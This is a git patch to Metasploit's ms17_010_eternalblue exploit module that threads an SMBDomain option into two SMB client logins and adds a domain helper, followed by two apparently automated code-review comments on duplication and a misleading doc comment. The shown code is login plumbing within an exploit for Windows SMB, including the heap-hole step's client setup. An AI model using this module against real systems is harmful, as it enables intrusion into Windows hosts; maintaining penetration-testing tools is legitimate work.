From d489cd7248b3e6bcb653085b868f7db45b98a509 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?=
Date: Wed, 29 Aug 2018 23:53:58 +0200
Subject: [PATCH] ms17_010_eternalblue: use SMBDomain value when provided instead of ignoring it
---
 .../windows/smb/ms17_010_eternalblue.rb | 18 ++++++++++++++++--
 1 file changed, 16 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
index 0afc054971..e7742ac72b 100644
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def smb1_anonymous_connect_ipc
 sock = connect(false)
 dispatcher = RubySMB::Dispatcher::Socket.new(sock)
- client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)
+ client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)
 response_code = client.login
 unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
@@ -365,7 +365,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def smb1_free_hole(start)
 sock = connect(false)
 dispatcher = RubySMB::Dispatcher::Socket.new(sock)
- client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)
+ client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)
 client.negotiate
 pkt = ""
@@ -696,4 +696,18 @@ class MetasploitModule < Msf::Exploit::Remote
 ''
 end
 end
+
+ # Returns the value to be passed to SMB clients for
+ # the domain. If the user has not supplied a domain
+ # it returns an empty string to trigger an anonymous
+ # logon.
+ #
+ # @return [String] the domain value
+ def smb_domain
+ if datastore['SMBDomain'].present?
+ datastore['SMBDomain']
+ else
+ ''
+ end
+ end
 end
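Review bot: The `RubySMB::Client.new(...)` line in `smb1_anonymous_connect_ipc` is repeated verbatim in `smb1_free_hole` (second hunk), so each new credential option has to be patched in two places, which is the kind of omission this commit is repairing. A small private helper that takes the dispatcher and returns the configured client would keep the two call sites in step. The method name `smb1_anonymous_connect_ipc` also no longer describes a login that may carry a user, domain and password, so a short comment saying so would help. Both method bodies continue outside their hunks, so any other client construction in the file is not visible here and should be checked for the same missing `domain:` argument.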
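Review bot: The doc comment on `smb_domain` says an empty domain is returned "to trigger an anonymous logon", which reads as copied from the user/password helpers. Whether a logon is anonymous depends on the username and password rather than the domain. I would reword it to something like `# Returns the SMBDomain option, or an empty string when it is unset.` so the next reader is not misled about what controls authentication. The body can also shrink to `datastore['SMBDomain'].presence || ''`, since the method already relies on ActiveSupport's `present?`. Only the tail of the preceding method is visible in this hunk's context, so I am assuming it is the sibling helper this one mirrors.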